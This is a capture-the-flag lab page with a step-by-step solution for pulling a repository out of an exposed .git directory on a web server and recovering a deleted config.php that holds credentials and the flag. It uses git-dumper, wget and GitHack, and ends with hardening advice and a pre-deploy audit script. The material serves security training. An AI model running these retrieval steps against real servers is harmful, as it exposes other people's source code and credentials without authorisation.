Labs / Git Exposed

  • Challenge
  • Released 22 Oct 2025

What secrets lie hidden in the commit history?

A corporate website looks ordinary, but beneath its surface lurks a developer's mistake that exposes everything. An exposed .git directory sits on the production server, ready to reveal its secrets to anyone who knows where to look. Dive into version control history, reconstruct deleted files, and uncover sensitive information that should never have made it to production. Can you extract the flag from the depths of Git history?

Flags: 1
Points: 5

🔓 Git Exposed - Complete Solution

Objective: Discover and exploit an exposed .git directory to extract sensitive information from the repository's commit history.

🔍 Step 1: Discovering the Exposed Repository

When you access the challenge, you'll see a standard corporate website. The vulnerability lies in an exposed .git directory that shouldn't be publicly accessible.

Testing for .git Exposure:

Try accessing these URLs directly:
<target-ip>/.git/HEAD
<target-ip>/.git/config

If these return content (like ref: refs/heads/master for HEAD), the .git directory is exposed and you can proceed with downloading it.

Why This Works: Developers sometimes deploy entire Git repositories to production servers instead of building clean artifacts. When web servers aren't configured to block access to hidden directories, the entire version control history becomes publicly accessible.

📥 Step 2: Downloading the Repository

Once you've confirmed the .git directory is accessible, you need to download it. There are several effective methods:

Method A: Using git-dumper (Recommended)

This specialized tool reconstructs repositories even when directory listing is disabled:

# Install git-dumper
pip3 install git-dumper

# Download the repository
git-dumper <target-ip>/.git/ ./downloaded-repo

# Navigate to the downloaded repository
cd downloaded-repo


Method B: Using wget (Manual)

If git-dumper isn't available, use wget to recursively download:

wget --mirror --no-parent --reject="index.html*" \
     --convert-links --adjust-extension \
     <target-ip>/.git/


Method C: Using GitHack

Another popular tool for downloading exposed repositories:

git clone https://github.com/lijiejie/GitHack.git
cd GitHack
python GitHack.py <target-ip>/.git/

🔎 Step 3: Analyzing the Repository History

With the repository downloaded, you can now analyze its complete history to find sensitive information.

Basic Git Commands:

# View commit history
git log --oneline

# View detailed history with changes
git log --stat

# Search for deleted files
git log --diff-filter=D --summary

# Search for specific content in history
git log --all -S 'flag'
git log --all -S 'password'
git log --all -S 'config'

What to Look For: Pay attention to commit messages mentioning "security", "remove", "delete", "credentials", or "config". These often indicate cleanup commits where sensitive data was removed from the working directory but remains in Git history.

🎯 Step 4: Extracting Deleted Files

Files deleted from the working directory remain in Git history and can be recovered. The flag is hidden in a deleted configuration file.

Finding Deleted Files:

# List all deleted files
git log --diff-filter=D --summary | grep delete

# Search for config.php specifically
git log --all -- config.php


You'll find commits mentioning config.php:
• One commit added it (contains the flag)
• A later commit removed it (security cleanup)

Recovering the File:

Once you identify the commit that added config.php, view its contents:

# Show file from specific commit
git show <commit-hash>:config.php

# Or view the file as it was X commits before HEAD, before the deletion
# (replace X with a number)
git show HEAD~X:config.php


The config.php file contains database credentials, API keys, and the flag defined as a PHP constant.

Finding the Flag: Look for a line like define('FLAG', '...'); in the deleted config.php file. This is your challenge flag.

🔧 Step 5: Alternative Search Methods

If you're having trouble locating the flag, try these advanced techniques:

Search All Commits for UUID Pattern:

# Search for UUID-formatted strings
git grep -E '[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}' \
    $(git rev-list --all)


Search Commit Messages:

# Look for flag-related commits
git log --all --grep='flag' -i
git log --all --grep='config' -i


View All File Changes:

# See what changed in each commit
git log --all --oneline --name-status

📚 Learning Points
  • Git History is Permanent: Deleted files remain accessible in commit history unless explicitly purged
  • Deployment Security: Never deploy .git directories to production - use build artifacts instead
  • Web Server Hardening: Configure nginx/Apache to block access to hidden directories
  • Sensitive Data: Never commit credentials, API keys, or flags - use environment variables
  • Git Secrets: Tools like git-secrets can prevent accidental credential commits

Real-World Prevention: Block .git access in nginx with location ~ /\.git { deny all; return 404; } and use proper CI/CD pipelines that deploy only necessary files, never entire repositories.
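
The "Git History is Permanent" and "Deployment Security" points above can be turned into a pre-deploy check. The script below is an added example, not part of the lab or its solution: it lists deleted files whose last surviving version still holds credential-like content, and refuses a deploy directory that contains .git. The function names, the sample repository and every pattern name other than FLAG are assumptions made for illustration.

```shell
# Credential-like patterns (assumed names; tune for your own code base).
SECRET_RE="define\('(FLAG|DB_PASSWORD|API_KEY)'"

# Print "<deleting-commit> <path>" for each deleted file in repo $1 whose
# last surviving version still matches SECRET_RE.
audit_deleted_secrets() {
  git -C "$1" log --all --diff-filter=D --format='commit %H' --name-only |
  while IFS= read -r line; do
    case $line in
      "commit "*) del=${line#commit } ;;
      "") ;;
      *) # "$del^" is the parent of the deleting commit; the file still exists there
         if git -C "$1" show "$del^:$line" 2>/dev/null | grep -Eq "$SECRET_RE"; then
           printf '%s %s\n' "$del" "$line"
         fi ;;
    esac
  done
}

# Succeed (exit 0) when the directory about to be deployed contains a .git entry.
artifact_has_git_metadata() {
  [ -n "$(find "$1" -name .git 2>/dev/null | head -n 1)" ]
}

# Constructed sample repository: config.php is committed, then "cleaned up".
make_demo_repo() {
  r=$(mktemp -d)
  g() { git -C "$r" -c user.name=demo -c user.email=demo@example.invalid "$@"; }
  {
    g init -q
    printf "<?php\ndefine('FLAG', 'constructed-placeholder');\n" > "$r/config.php"
    echo '<h1>Example Corp</h1>' > "$r/index.html"
    g add -A && g commit -q -m 'Initial site'
    g rm -q config.php && g commit -q -m 'Remove config (security cleanup)'
  } >/dev/null 2>&1
  echo "$r"
}

demo=$(make_demo_repo)
audit_deleted_secrets "$demo"   # reports config.php although it is gone from the tree
artifact_has_git_metadata "$demo" && echo "refuse to deploy: $demo contains .git"
```

A hit from audit_deleted_secrets means the secret must be rotated; deleting the file in a later commit, as the cleanup commit in this lab did, does not remove it from history.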